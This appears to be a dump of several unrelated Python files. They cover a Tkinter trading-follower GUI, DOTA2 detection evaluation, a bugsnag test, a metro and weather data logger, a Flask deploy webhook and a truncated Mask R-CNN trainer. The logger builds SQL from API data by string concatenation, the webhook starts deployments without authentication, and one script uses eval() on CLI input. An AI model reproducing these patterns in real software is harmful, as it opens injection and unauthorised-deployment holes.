font=self.label_font_style, command=self.clear_console) self.clear_console_button.place(x=UI.Main.CLEAR_CONSOLE_BUTTON_X, y=UI.Main.CLEAR_CONSOLE_BUTTON_Y) self.disclaimer_link = tk.Label(self.remark_trade_app_frame, text="免責聲明", fg="blue", cursor="hand2") self.disclaimer_link.grid(row=0, column=0, sticky=tk.E) self.disclaimer_link.bind("<Button-1>", lambda e: self.load_disclaimer(read_only=True)) self.github_link = tk.Label(self.remark_trade_app_frame, text="GitHub", fg="blue", cursor="hand2") self.github_link.grid(row=0, column=1, sticky=tk.E) self.github_link.bind("<Button-1>", lambda e: utils.open_link(constants.GITHUB_REPO_LINK)) self.app = trade_app def load_trade_app_config(self): default_telegram_dialog_id = self.config.get_default_telegram_dialog_id() trade_port = self.config.get_trade_port() if default_telegram_dialog_id is not None and default_telegram_dialog_id != "": default_telegram_dialog_id = int(default_telegram_dialog_id) telegram_dialog_id_list = [dialog['id'] for dialog in self.telegram_dialog_list] if default_telegram_dialog_id in telegram_dialog_id_list: dialog_index = telegram_dialog_id_list.index(default_telegram_dialog_id) if dialog_index >= 0: self.dialog_select.current(dialog_index) self.dialog_select_on_select() self.trade_port_var.set(trade_port) trade_mode = self.config.get_trade_setting("trade_mode") trade_product_hsi = self.config.get_trade_setting("trade_product_hsi") == "Y" trade_product_mhi = self.config.get_trade_setting("trade_product_mhi") == "Y" hsi_trade_quantity = self.config.get_trade_setting("hsi_trade_quantity") mhi_trade_quantity = self.config.get_trade_setting("mhi_trade_quantity") hsi_margin = self.config.get_trade_setting("hsi_margin") mhi_margin = self.config.get_trade_setting("mhi_margin") trade_period_morning = self.config.get_trade_setting("trade_period_morning") == "Y" trade_period_afternoon = self.config.get_trade_setting("trade_period_afternoon") == "Y" trade_period_night = self.config.get_trade_setting("trade_period_night") == "Y" open_extra_price = self.config.get_trade_setting("open_extra_price") close_price_adjust_interval = self.config.get_trade_setting("close_price_adjust_interval") cancel_unfulfilled_order_after_second = self.config.get_trade_setting( "cancel_unfulfilled_order_after_second") trade_only_within_second = self.config.get_trade_setting("trade_only_within_second") manual_confirm_trade_message = self.config.get_trade_setting("manual_confirm_trade_message") self.trade_mode_var.set(trade_mode) self.trade_product_hsi_var.set(trade_product_hsi) self.trade_product_mhi_var.set(trade_product_mhi) self.trade_mode_checkbox_on_change() self.hsi_trade_quantity_var.set(hsi_trade_quantity) self.mhi_trade_quantity_var.set(mhi_trade_quantity) self.hsi_margin_var.set(hsi_margin) self.mhi_margin_var.set(mhi_margin) self.trade_period_morning_var.set(trade_period_morning) self.trade_period_afternoon_var.set(trade_period_afternoon) self.trade_period_night_var.set(trade_period_night) self.open_extra_price_var.set(open_extra_price) self.close_price_adjust_interval_var.set(close_price_adjust_interval) self.cancel_unfulfilled_order_after_second_var.set(cancel_unfulfilled_order_after_second) self.trade_only_within_second_var.set(trade_only_within_second) self.manual_confirm_trade_message_var.set(manual_confirm_trade_message) def dialog_select_on_select(self, var=''): self.selected_dialog_id = self.telegram_dialog_list[self.dialog_select.current()]['id'] self.config.save_default_telegram_dialog_id(self.selected_dialog_id) self.enable_elements( self.dialog_save_setting_button, self.dialog_test_button, self.open_buy_template_entry, self.close_buy_template_entry, self.open_sell_template_entry, self.close_sell_template_entry, self.time_format_entry ) dialog_setting = self.config.get_telegram_dialog_setting(self.selected_dialog_id) if dialog_setting is not None: self.open_buy_template_var.set(dialog_setting['open_buy_template']) self.close_buy_template_var.set(dialog_setting['close_buy_template']) self.open_sell_template_var.set(dialog_setting['open_sell_template']) self.close_sell_template_var.set(dialog_setting['close_sell_template']) self.time_format_var.set(dialog_setting['time_format']) else: self.open_buy_template_var.set('') self.close_buy_template_var.set('') self.open_sell_template_var.set('') self.close_sell_template_var.set('') self.time_format_var.set('') async def refresh_dialog_list(self, *args): pass async def test_dialog_setting(self, *args): pass def save_dialog_setting(self): if self.selected_dialog_id is not None: self.disable_elements(self.dialog_save_setting_button) self.config.save_telegram_dialog_setting(self.selected_dialog_id, self.open_buy_template_entry.get(), self.close_buy_template_entry.get(), self.open_sell_template_entry.get(), self.close_sell_template_entry.get(), self.time_format_entry.get() ) self.config.save() self.console_write_line("成功儲存頻道訊息設定") messagebox.showinfo("頻道設定", "成功儲存訊息設定") self.dialog_save_setting_button.after(100, self.enable_elements(self.dialog_save_setting_button)) @staticmethod def enable_elements(*elements): for element in elements: if type(element) == tk.ttk.Combobox: element['state'] = "readonly" else: element['state'] = tk.NORMAL @staticmethod def disable_elements(*elements): for element in elements: element['state'] = tk.DISABLED def trade_port_entry_on_change(self, sv): max_port_length = 5 port = sv.get() port = ''.join([n for n in port if n.isdigit()]) sv.set(port) if len(port) > max_port_length: port = port[:max_port_length] sv.set(port) if self.config.get_trade_port() != port: self.config.save_trade_port(port) def trade_setting_entry_on_change(self, sv, code, value_type): value = sv.get() if value_type == constants.TkinterEntryType.POSITIVE_INTEGER: value = ''.join([n for n in value if n.isdigit()]) elif value_type == constants.TkinterEntryType.INTEGER: value = ''.join([value[i] for i in range(len(value)) if value[i].isdigit() or (i == 0 and value[i] == "-")]) elif value_type == constants.TkinterEntryType.FLOAT: has_dot = False values = [] for n in value: if n.isdigit(): values.append(n) elif n == "." and has_dot is False: has_dot = True values.append(n) value = ''.join(values) sv.set(value) if self.config.get_trade_setting(code) != value: self.config.set_trade_setting(code, value) self.config.save() async def validate_trade_account_setting(self): pass async def test_trade_account_setting(self, *args): pass def get_raw_trade_settings(self): trade_mode = self.trade_mode_var.get() trade_product_hsi = self.trade_product_hsi_var.get() trade_product_mhi = self.trade_product_mhi_var.get() hsi_trade_quantity = self.hsi_trade_quantity_var.get() mhi_trade_quantity = self.mhi_trade_quantity_entry.get() hsi_margin = self.hsi_margin_var.get() mhi_margin = self.mhi_margin_var.get() trade_period_morning = self.trade_period_morning_var.get() trade_period_afternoon = self.trade_period_afternoon_var.get() trade_period_night = self.trade_period_night_var.get() open_extra_price = self.open_extra_price_var.get() close_price_adjust_interval = self.close_price_adjust_interval_var.get() cancel_unfulfilled_order_after_second = self.cancel_unfulfilled_order_after_second_var.get() trade_only_within_second = self.trade_only_within_second_var.get() manual_confirm_trade_message = self.manual_confirm_trade_message_var.get() return { 'trade_mode': trade_mode, 'trade_product_hsi': trade_product_hsi, 'trade_product_mhi': trade_product_mhi, 'hsi_trade_quantity': hsi_trade_quantity, 'mhi_trade_quantity': mhi_trade_quantity, 'hsi_margin': hsi_margin, 'mhi_margin': mhi_margin, 'trade_period_morning': trade_period_morning, 'trade_period_afternoon': trade_period_afternoon, 'trade_period_night': trade_period_night, 'open_extra_price': open_extra_price, 'close_price_adjust_interval': close_price_adjust_interval, 'cancel_unfulfilled_order_after_second': cancel_unfulfilled_order_after_second, 'trade_only_within_second': trade_only_within_second, 'manual_confirm_trade_message': manual_confirm_trade_message } async def validate_trade_setting(self, *args): pass def trade_mode_checkbox_on_change(self, force_update=False): trade_mode = self.trade_mode_var.get() if force_update is True or trade_mode != self.selected_trade_mode: self.selected_trade_mode = trade_mode if trade_mode == constants.TradeMode.FIXED_QUANTITY: if self.trade_product_hsi_var.get() is True: self.enable_elements(self.hsi_trade_quantity_entry) else: self.disable_elements(self.hsi_trade_quantity_entry) if self.trade_product_mhi_var.get() is True: self.enable_elements(self.mhi_trade_quantity_entry) else: self.disable_elements(self.mhi_trade_quantity_entry) self.disable_elements(self.hsi_margin_entry, self.mhi_margin_entry) elif trade_mode == constants.TradeMode.MAX_QUANTITY: if self.trade_product_hsi_var.get() is True: self.enable_elements(self.hsi_margin_entry) else: self.disable_elements(self.hsi_margin_entry) if self.trade_product_mhi_var.get() is True: self.enable_elements(self.mhi_margin_entry) else: self.disable_elements(self.mhi_margin_entry) self.disable_elements(self.hsi_trade_quantity_entry, self.mhi_trade_quantity_entry) self.config.set_trade_setting("trade_mode", trade_mode) self.config.save() def trade_product_checkbox_on_change(self): trade_product_hsi = "Y" if self.trade_product_hsi_var.get() is True else "N" trade_product_mhi = "Y" if self.trade_product_mhi_var.get() is True else "N" self.config.set_trade_setting("trade_product_hsi", trade_product_hsi) self.config.set_trade_setting("trade_product_mhi", trade_product_mhi) self.config.save() self.disable_elements(self.hsi_margin_entry, self.mhi_margin_entry, self.hsi_trade_quantity_entry, self.mhi_trade_quantity_entry) trade_mode = self.trade_mode_var.get() if trade_mode == constants.TradeMode.FIXED_QUANTITY: if trade_product_hsi == "Y": self.enable_elements(self.hsi_trade_quantity_entry) if trade_product_mhi == "Y": self.enable_elements(self.mhi_trade_quantity_entry) elif trade_mode == constants.TradeMode.MAX_QUANTITY: if trade_product_hsi == "Y": self.enable_elements(self.hsi_margin_entry) if trade_product_mhi == "Y": self.enable_elements(self.mhi_margin_entry) def trade_setting_checkbox_on_change(self, value, code): value = "Y" if value.get() is True else "N" self.config.set_trade_setting(code, value) self.config.save() def console_insert_empty_line(self): self.enable_elements(self.console_text) self.console_text.insert(tk.END, "\n") self.disable_elements(self.console_text) self.console_text.see(tk.END) def console_write_line(self, message, tag=""): self.enable_elements(self.console_text) time_str = utils.get_local_datetime_str_in_default_format() self.console_text.insert(tk.END, time_str, constants.TkinterTextColorTag.LogTime.TITLE) self.console_text.insert(tk.END, "\t\t") if "\n" not in message: console_message = (constants.TEXTWRAP_SEPARATOR + " ").join(textwrap.wrap(message, width=65)) else: console_message = message self.console_text.insert(tk.END, console_message, tag) self.console_text.insert(tk.END, "\n") logger.info("[CONSOLE]" + time_str + " " + message) self.run_async_task(self.tg.client.send_message, 'me', f"[TFT] {message}") self.disable_elements(self.console_text) self.console_text.see(tk.END) def console_write_text(self, message, tag="", is_start=False, is_end=False): self.enable_elements(self.console_text) if is_start: time_str = utils.get_local_datetime_str_in_default_format() self.console_text.insert(tk.END, time_str, constants.TkinterTextColorTag.LogTime.TITLE) self.console_text.insert(tk.END, "\t\t") self.console_text_cache = "" self.console_text_cache_time = time_str log_message = message if constants.TEXTWRAP_SEPARATOR in message: log_message = message.replace(constants.TEXTWRAP_SEPARATOR, "") self.console_text.insert(tk.END, message, tag) self.console_text_cache += log_message if is_end: self.console_text.insert(tk.END, "\n") logger.info("[CONSOLE]" + self.console_text_cache_time + " " + self.console_text_cache) self.run_async_task(self.tg.client.send_message, 'me', f"[TFT] {self.console_text_cache}") self.console_text_cache = "" self.console_text_cache_time = "" self.disable_elements(self.console_text) self.console_text.see(tk.END) def clear_console(self): self.enable_elements(self.console_text) self.console_text.delete(1.0, tk.END) self.disable_elements(self.console_text) def async_thread(self, func, *args): self.async_loop.run_until_complete(func(*args)) def run_async_task(self, *args): t = threading.Thread(target=self.async_thread, args=args) t.daemon = True t.start() async def start_follow_trade(self, *args): pass def stop_follow_trade(self): pass def get_elements_to_be_disabled_on_start_follow_trade(self): return (self.dialog_select, self.dialog_test_button, self.dialog_update_button, self.dialog_save_setting_button, self.open_buy_template_entry, self.close_buy_template_entry, self.open_sell_template_entry, self.close_sell_template_entry, self.time_format_entry, self.trade_password_entry, self.trade_port_entry, self.trade_password_test_button, self.trade_mode_fixed_quantity, self.trade_mode_max_quantity, self.trade_product_hsi, self.trade_product_mhi, self.hsi_trade_quantity_entry, self.mhi_trade_quantity_entry, self.hsi_margin_entry, self.mhi_margin_entry, self.trade_period_morning, self.trade_period_afternoon, self.trade_period_night, self.open_extra_price_entry, self.close_price_adjust_interval_entry, self.cancel_unfulfilled_order_after_second_entry, self.trade_only_within_second_entry, self.manual_confirm_trade_message) def disable_elements_on_start_follow_trade(self): self.disable_elements(*self.get_elements_to_be_disabled_on_start_follow_trade()) def enable_elements_on_stop_follow_trade(self): self.enable_elements(*self.get_elements_to_be_disabled_on_start_follow_trade()) self.trade_mode_checkbox_on_change(True)
evaluate_dist.py
import sys sys.path.append('.') import os import tqdm import torch import random import shutil import argparse import numpy as np import multiprocessing from collections import defaultdict from torch.utils.data import DataLoader from data.aug import ops from data.dataset import DOTA2 from data.aug.compose import Compose from data.dataset.dota2 import NAMES from model.net import Net from model.backbone import resnet from utils.utils import hyp_parse from utils.box.bbox_np import xywha2xy4, xy42xywha from utils.box.rbbox_np import rbbox_batched_nms from utils.parallel import CustomDetDataParallel from torch import distributed as dist from torch.nn import SyncBatchNorm def set_seed(seed): random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) @torch.no_grad() def main(args, rank, world_size, res): torch.cuda.set_device(rank) dist.init_process_group("nccl", init_method='env://', rank=rank, world_size=world_size) set_seed(0) torch.backends.cudnn.benchmark = True backbone = resnet.resnet101 batch_size = 8 num_workers = 4 image_size = 768 data_dir = 'data/DOTA2' dir_save = 'weights/dota2_weight' image_set = 'test' checkpoint = os.path.join(dir_save, args.ckpt) aug = Compose([ops.PadSquare(), ops.Resize(image_size)]) dataset = DOTA2(data_dir, image_set, aug) test_sampler = torch.utils.data.distributed.DistributedSampler(dataset, world_size, rank) batch_sampler = torch.utils.data.BatchSampler(test_sampler, batch_size, drop_last=True) loader = DataLoader(dataset, batch_sampler=batch_sampler,\ num_workers=num_workers, pin_memory=True, collate_fn=dataset.collate) num_classes = len(dataset.names) prior_box = { 'strides': [8, 16, 32, 64, 128], 'sizes': [3] * 5, 'aspects': [[1, 2, 4, 8]] * 5, 'scales': [[2 ** 0, 2 ** (1 / 3), 2 ** (2 / 3)]] * 5, } conf_thresh = 0.01 cfg = { 'prior_box': prior_box, 'num_classes': num_classes, 'extra': 2, 'conf_thresh': conf_thresh, } device = torch.device(f'cuda:{rank}') model = Net(backbone(fetch_feature=True), cfg) model.build_pipe(shape=[2, 3, image_size, image_size]) model = SyncBatchNorm.convert_sync_batchnorm(model) model.to(device) model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[rank]) model.module.load_state_dict(torch.load(checkpoint, map_location=device)) model.eval() ret_raw = defaultdict(list) for images, targets, infos in tqdm.tqdm(loader): images = images.cuda() / 255 dets = model(images) for (det, info) in zip(dets, infos): if det: bboxes, scores, labels = det bboxes = bboxes.cpu().numpy() scores = scores.cpu().numpy() labels = labels.cpu().numpy() fname, x, y, w, h = os.path.splitext(os.path.basename(info['img_path']))[0].split('-')[:5] x, y, w, h = int(x), int(y), int(w), int(h) long_edge = max(w, h) pad_x, pad_y = (long_edge - w) // 2, (long_edge - h) // 2 bboxes = np.stack([xywha2xy4(bbox) for bbox in bboxes]) bboxes *= long_edge / image_size bboxes -= [pad_x, pad_y] bboxes += [x, y] bboxes = np.stack([xy42xywha(bbox) for bbox in bboxes]) ret_raw[fname].append([bboxes, scores, labels]) res.update(ret_raw) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Distributed evaluation for DOTA2 dataset...') parser.add_argument('--gpus', help='num of gpus') parser.add_argument('--ckpt', help='checkpoint') parser.add_argument('--use_voc07', help='voc07 or voc10 metric') parser.add_argument('--local_rank', default=-1, type=int, help='node rank for distributed training') args = parser.parse_args() nms_thresh = 0.45 multiprocessing.set_start_method('spawn') if ',' in args.gpus: device_ids = [eval(x) for x in args.gpus.split(',') if len(x)!=0] os.environ["CUDA_VISIBLE_DEVICES"] = ','.join([str(id) for id in device_ids]) device_ids = list(range(len(device_ids))) else: device_ids = [x for x in range(int(eval(args.gpus)))] res = multiprocessing.Manager().dict() processes = [] for device_id in device_ids: p = multiprocessing.Process(target=main, args=(args, device_id, len(device_ids), res)) p.start() processes.append(p) for p in processes: p.join() print('merging results...') ret = [] for fname, dets in res.items(): bboxes, scores, labels = zip(*dets) bboxes = np.concatenate(list(bboxes)) scores = np.concatenate(list(scores)) labels = np.concatenate(list(labels)) keeps = rbbox_batched_nms(bboxes, scores, labels, nms_thresh) ret.append([fname, [bboxes[keeps], scores[keeps], labels[keeps]]]) print('converting to submission format...') ret_save = defaultdict(list) for fname, (bboxes, scores, labels) in ret: for bbox, score, label in zip(bboxes, scores, labels): bbox = xywha2xy4(bbox).ravel() line = '%s %.12f %.1f %.1f %.1f %.1f %.1f %.1f %.1f %.1f' % (fname, score, *bbox) ret_save[NAMES[label]].append(line) print('saving...') os.makedirs('submission', exist_ok=True) for name, dets in ret_save.items(): with open(os.path.join('submission', 'Task%d_%s.txt' % (1, name)), 'wt') as f: f.write('\n'.join(dets)) print('creating submission...') if os.path.exists('Task1.zip'): os.remove('Task1.zip') os.system('zip -j Task1.zip {}'.format('submission/*')) shutil.rmtree('submission') print('finished')
test_sessionmiddleware.py
import unittest import threading from bugsnag.sessiontracker import SessionTracker, SessionMiddleware from bugsnag.configuration import Configuration from bugsnag.event import Event class TestSessionMiddleware(unittest.TestCase): def setUp(self): self.config = Configuration() self.config.configure(api_key='fff', auto_capture_sessions=False) self.sessiontracker = SessionTracker(self.config) self.sessiontracker.auto_sessions = True # Stub session delivery queue def tearDown(self): pass def test_increment_counts(self): """ Every event should keep a list of prior events which occurred in the session """ def next_callable(event): pass middleware = SessionMiddleware(next_callable) self.sessiontracker.start_session() event = Event(Exception('shucks'), self.config, None) middleware(event) assert event.session['events']['unhandled'] == 0 assert event.session['events']['handled'] == 1 event2 = Event(Exception('oh no'), self.config, None) middleware(event2) assert event2.session['events']['unhandled'] == 0 assert event2.session['events']['handled'] == 2 # Session counts should not change for events already handled assert event.session['events']['unhandled'] == 0 assert event.session['events']['handled'] == 1 def test_it_does_nothing_if_no_session_exists(self): def run_session_middleware(): def next_callable(event): pass try: thread.exc_info = None middleware = SessionMiddleware(next_callable) event = Event(Exception('shucks'), self.config, None) middleware(event) assert event.session is None except Exception: import sys thread.exc_info = sys.exc_info() thread = threading.Thread(target=run_session_middleware) thread.start() thread.join() # ensure there was no exception in the thread self.assertEqual(None, thread.exc_info, thread.exc_info)
main.py
import datetime import queue import threading import jaydebeapi import jpype import requests import json token_ct = '###############################' dsn = '############################' uid = '########' pwd = '########' tbl_m = 'METRO_STATUS' tbl_w = 'WEATHER' jar = 'db2jcc4.jar' # location of the jdbc driver jar args='-Djava.class.path=%s' % jar jvm = jpype.getDefaultJVMPath() jpype.startJVM(jvm, args) def exec_query(query): conn = jaydebeapi.connect( 'com.ibm.db2.jcc.DB2Driver', dsn, [uid,pwd] ) curs = conn.cursor() if(isinstance(query, list)): for stmt in query: curs.execute(stmt) else: curs.execute(query) curs.close() conn.close() return 200, 'Success' def build_query(content): num_rows = len(content['metro_content']) datenow = str(datetime.datetime.now()) wc = content['weather_content']['data'] # defining weather query query_w = 'INSERT INTO ' + tbl_w + ' VALUES (' + str(wc['temperature']) + "," \ + str(wc['sensation']) + ",'" + str(wc['wind_direction']) + "'," + \ str(wc['wind_velocity']) + "," + str(wc['humidity']) + ",'" + \ str(wc['condition']) + "'," + str(wc['pressure']) + ",'" + datenow + "')" # defining metro_status query query_m = 'INSERT INTO ' + tbl_m + ' VALUES ' for idx, record in enumerate(content['metro_content']): query_m = query_m + "(" + record['Codigo'] + ",'" + record['StatusOperacao'] \ + "','" + record['Descricao'] + "','" + datenow + "')" if idx+1 < num_rows: query_m = query_m + ', ' return [query_m, query_w] def save_content(content): querys = build_query(content) return exec_query(querys) def get_metro_content(out_queue): req = requests.get('https://www.viamobilidade.com.br/_vti_bin/SituacaoService.svc/GetAllSituacao') if req.status_code == 200: json_response = req.json() else: json_response = [] out_queue.put(json_response) return json_response def get_weather_content(out_queue): req = requests.get('http://apiadvisor.climatempo.com.br/api/v1/weather/locale/3477/current?token=' + token_ct) if req.status_code == 200: json_response = req.json() else: json_response = {} out_queue.put(json_response) return json_response def get_content_multhreading(): my_queue = queue.Queue() t1 = threading.Thread(target=get_metro_content, args=(my_queue,)) t2 = threading.Thread(target=get_weather_content, args=(my_queue,)) t1.start() t2.start() t1.join() t2.join() content_w = my_queue.get() content_m = my_queue.get() m_status = 200 w_status = 200 if(isinstance(content_m, dict)): content_m, content_w = content_w, content_m if len(content_m) == 0: m_status = 500 if len(content_w) == 0: w_status = 500 return content_m, m_status, content_w, w_status def get_content(): #metro_content, m_status = get_metro_content() #weather_content, w_status = get_weather_content() content_m, m_status, content_w, w_status = get_content_multhreading() if m_status == 200 and w_status == 200: content = {} content['metro_content'] = content_m content['weather_content'] = content_w return content, 200, '' else: msg = 'Could not retrieve' if m_status != 200: msg = msg + ', Metro' if w_status != 200: msg = msg + ', Weather' msg = msg + ' content.' return {}, 500, msg def main(): content, status, msg = get_content() if(status == 200): status, msg = save_content(content) if(status != 200): pass # TODO # send_warning_email(status, msg) return status if __name__ == "__main__": main()
webserver.py
from threading import Thread import subprocess from slackclient import SlackClient from flask import Flask from flask import request from flask import jsonify app = Flask(__name__) slack_token = "<slack token>" sc = SlackClient(slack_token) def deploy(x): print("running deployment...") subprocess.call(["/bin/bash", "home/project/deploy/deploy.sh"]) sc.api_call("chat.postMessage", channel="<channel>", text="The deployent has been completed!") @app.route('/webhooks/lpa', methods=["POST"]) def listen_webhook(): data = request.get_json() branch = data["pull_request"]["base"]["ref"] action = data["action"] merged = data["pull_request"]["merged"] if branch and "master" in branch and action == "closed" and merged: #Spawn thread to process the data sc.api_call("chat.postMessage", channel="<channel>", text="A deployment to https://applications.linkedpipes.com has started...") t = Thread(target=deploy, args=(data,)) t.start() return jsonify({"message": "deployment will be made"}), 200 return jsonify({"message": "No deployment made."}), 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=8085)
train_mask_rcnn.py
"""Train Mask RCNN end to end.""" import argparse import os # disable autotune os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '0' os.environ['MXNET_GPU_MEM_POOL_TYPE'] = 'Round' os.environ['MXNET_GPU_MEM_POOL_ROUND_LINEAR_CUTOFF'] = '28' os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD'] = '999' os.environ['MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD'] = '25' os.environ['MXNET_GPU_COPY_NTHREADS'] = '1' os.environ['MXNET_OPTIMIZER_AGGREGATION_SIZE'] = '54' os.environ['MXNET_USE_FUSION'] = '0' import logging import time import numpy as np import mxnet as mx from mxnet import gluon from mxnet.contrib import amp from distutils.version import LooseVersion import gluoncv as gcv _PRE_GCV_0_9_0 = LooseVersion(gcv.__version__) < LooseVersion('0.9.0') gcv.utils.check_version('0.7.0') from gluoncv import data as gdata from gluoncv import utils as gutils from gluoncv.model_zoo import get_model from gluoncv.data import batchify from gluoncv.data.transforms.presets.rcnn import MaskRCNNDefaultTrainTransform, \ MaskRCNNDefaultValTransform from gluoncv.utils.metrics.coco_instance import COCOInstanceMetric from gluoncv.utils.metrics.rcnn import RPNAccMetric, RPNL1LossMetric, RCNNAccMetric, \ RCNNL1LossMetric, MaskAccMetric, MaskFGAccMetric from gluoncv.utils.parallel import Parallel from gluoncv.data import COCODetection, VOCDetection from multiprocessing import Process from gluoncv.model_zoo.rcnn.mask_rcnn.data_parallel import ForwardBackwardTask try: import horovod.mxnet as hvd except ImportError: hvd = None try: from mpi4py import MPI except ImportError: logging.info('mpi4py is not installed. Use "pip install --no-cache mpi4py" to install') MPI = None # from mxnet import profiler def parse_args(): parser = argparse.ArgumentParser(description='Train Mask R-CNN network end to end.') parser.add_argument('--network', type=str, default='resnet50_v1b', help="Base network name which serves as feature extraction base.") parser.add_argument('--dataset', type=str, default='coco', help='Training dataset. Now support coco.') parser.add_argument('--num-workers', '-j', dest='num_workers', type=int, default=4, help='Number of data workers, you can use larger ' 'number to accelerate data loading, if you CPU and GPUs ' 'are powerful.') parser.add_argument('--batch-size', type=int, default=8, help='Training mini-batch size.') parser.add_argument('--gpus', type=str, default='0', help='Training with GPUs, you can specify 1,3 for example.') parser.add_argument('--epochs', type=str, default='', help='Training epochs.') parser.add_argument('--resume', type=str, default='', help='Resume from previously saved parameters if not None. ' 'For example, you can resume from ./mask_rcnn_xxx_0123.params') parser.add_argument('--start-epoch', type=int, default=0, help='Starting epoch for resuming, default is 0 for new training.' 'You can specify it to 100 for example to start from 100 epoch.') parser.add_argument('--lr', type=str, default='', help='Learning rate, default is 0.01 for coco 8 gpus training.') parser.add_argument('--lr-decay', type=float, default=0.1, help='decay rate of learning rate. default is 0.1.') parser.add_argument('--lr-decay-epoch', type=str, default='', help='epochs at which learning rate decays. default is 17,23 for coco.') parser.add_argument('--lr-warmup', type=str, default='', help='warmup iterations to adjust learning rate, default is 1000 for coco.') parser.add_argument('--lr-warmup-factor', type=float, default=1. / 3., help='warmup factor of base lr.') parser.add_argument('--clip-gradient', type=float, default=-1., help='gradient clipping.') parser.add_argument('--momentum', type=float, default=0.9, help='SGD momentum, default is 0.9') parser.add_argument('--wd', type=str, default='', help='Weight decay, default is 1e-4 for coco') parser.add_argument('--log-interval', type=int, default=100, help='Logging mini-batch interval. Default is 100.') parser.add_argument('--save-prefix', type=str, default='', help='Saving parameter prefix') parser.add_argument('--save-interval', type=int, default=1, help='Saving parameters epoch interval, best model will always be saved.') parser.add_argument('--val-interval', type=int, default=1, help='Epoch interval for validation, increase the number will reduce the ' 'training time if validation is slow.') parser.add_argument('--seed', type=int, default=233, help='Random seed to be fixed.') parser.add_argument('--verbose', dest='verbose', action='store_true', help='Print helpful debugging info once set.') # Norm layer options parser.add_argument('--norm-layer', type=str, default=None, help='Type of normalization layer to use. ' 'If set to None, backbone normalization layer will be fixed,' ' and no normalization layer will be used. ' 'Currently supports \'bn\', and None, default is None') # Loss options parser.add_argument('--rpn-smoothl1-rho', type=float, default=1. / 9., help='RPN box regression transition point from L1 to L2 loss.' 'Set to 0.0 to make the loss simply L1.') parser.add_argument('--rcnn-smoothl1-rho', type=float, default=1., help='RCNN box regression transition point from L1 to L2 loss.' 'Set to 0.0 to make the loss simply L1.') # FPN options parser.add_argument('--use-fpn', action='store_true', help='Whether to use feature pyramid network.') # Performance options parser.add_argument('--disable-hybridization', action='store_true', help='Whether to disable hybridize the entire model. ' 'Memory usage and speed will decrese.') parser.add_argument('--static-alloc', action='store_true', help='Whether to use static memory allocation. Memory usage will increase.') parser.add_argument('--amp', action='store_true', help='Use MXNet AMP for mixed precision training.') parser.add_argument('--horovod', action='store_true', help='Use MXNet Horovod for distributed training. Must be run with OpenMPI. ' '--gpus is ignored when using --horovod.') parser.add_argument('--use-ext', action='store_true', help='Use NVIDIA MSCOCO API. Make sure you install first') parser.add_argument('--executor-threads', type=int, default=1, help='Number of threads for executor for scheduling ops. ' 'More threads may incur higher GPU memory footprint, ' 'but may speed up throughput. Note that when horovod is used, ' 'it is set to 1.') parser.add_argument('--kv-store', type=str, default='nccl', help='KV store options. local, device, nccl, dist_sync, dist_device_sync, ' 'dist_async are available.') # Advanced options. Expert Only!! Currently non-FPN model is not supported!! # Default setting is for MS-COCO. # The following options are only used if custom-model is enabled subparsers = parser.add_subparsers(dest='custom_model') custom_model_parser = subparsers.add_parser( 'custom-model', help='Use custom Faster R-CNN w/ FPN model. This is for expert only!' ' You can modify model internal parameters here. Once enabled, ' 'custom model options become available.') custom_model_parser.add_argument( '--no-pretrained-base', action='store_true', help='Disable pretrained base network.') custom_model_parser.add_argument( '--num-fpn-filters', type=int, default=256, help='Number of filters in FPN output layers.') custom_model_parser.add_argument( '--num-box-head-conv', type=int, default=4, help='Number of convolution layers to use in box head if ' 'batch normalization is not frozen.') custom_model_parser.add_argument( '--num-box-head-conv-filters', type=int, default=256, help='Number of filters for convolution layers in box head.' ' Only applicable if batch normalization is not frozen.') custom_model_parser.add_argument( '--num_box_head_dense_filters', type=int, default=1024, help='Number of hidden units for the last fully connected layer in ' 'box head.') custom_model_parser.add_argument( '--image-short', type=str, default='800', help='Short side of the image. Pass a tuple to enable random scale augmentation.') custom_model_parser.add_argument( '--image-max-size', type=int, default=1333, help='Max size of the longer side of the image.') custom_model_parser.add_argument( '--nms-thresh', type=float, default=0.5, help='Non-maximum suppression threshold for R-CNN. ' 'You can specify < 0 or > 1 to disable NMS.') custom_model_parser.add_argument( '--nms-topk', type=int, default=-1, help='Apply NMS to top k detection results in R-CNN. ' 'Set to -1 to disable so that every Detection result is used in NMS.') custom_model_parser.add_argument( '--post-nms', type=int, default=-1, help='Only return top `post_nms` detection results, the rest is discarded.' ' Set to -1 to return all detections.') custom_model_parser.add_argument( '--roi-mode', type=str, default='align', choices=['align', 'pool'], help='ROI pooling mode. Currently support \'pool\' and \'align\'.') custom_model_parser.add_argument( '--roi-size', type=str, default='14,14', help='The output spatial size of ROI layer. eg. ROIAlign, ROIPooling') custom_model_parser.add_argument( '--strides', type=str, default='4,8,16,32,64', help='Feature map stride with respect to original image. ' 'This is usually the ratio between original image size and ' 'feature map size. Since the custom model uses FPN, it is a list of ints') custom_model_parser.add_argument( '--clip', type=float, default=4.14, help='Clip bounding box transformation predictions ' 'to prevent exponentiation from overflowing') custom_model_parser.add_argument( '--rpn-channel', type=int, default=256, help='Number of channels used in RPN convolution layers.') custom_model_parser.add_argument( '--anchor-base-size', type=int, default=16, help='The width(and height) of reference anchor box.') custom_model_parser.add_argument( '--anchor-aspect-ratio', type=str, default='0.5,1,2', help='The aspect ratios of anchor boxes.') custom_model_parser.add_argument( '--anchor-scales', type=str, default='2,4,8,16,32', help='The scales of anchor boxes with respect to base size. ' 'We use the following form to compute the shapes of anchors: ' 'anchor_width = base_size * scale * sqrt(1 / ratio)' 'anchor_height = base_size * scale * sqrt(ratio)') custom_model_parser.add_argument( '--anchor-alloc-size', type=str, default='384,384', help='Allocate size for the anchor boxes as (H, W). ' 'We generate enough anchors for large feature map, e.g. 384x384. ' 'During inference we can have variable input sizes, ' 'at which time we can crop corresponding anchors from this large ' 'anchor map so we can skip re-generating anchors for each input. ') custom_model_parser.add_argument( '--rpn-nms-thresh', type=float, default='0.7', help='Non-maximum suppression threshold for RPN.') custom_model_parser.add_argument( '--rpn-train-pre-nms', type=int, default=12000, help='Filter top proposals before NMS in RPN training.') custom_model_parser.add_argument( '--rpn-train-post-nms', type=int, default=2000, help='Return top proposal results after NMS in RPN 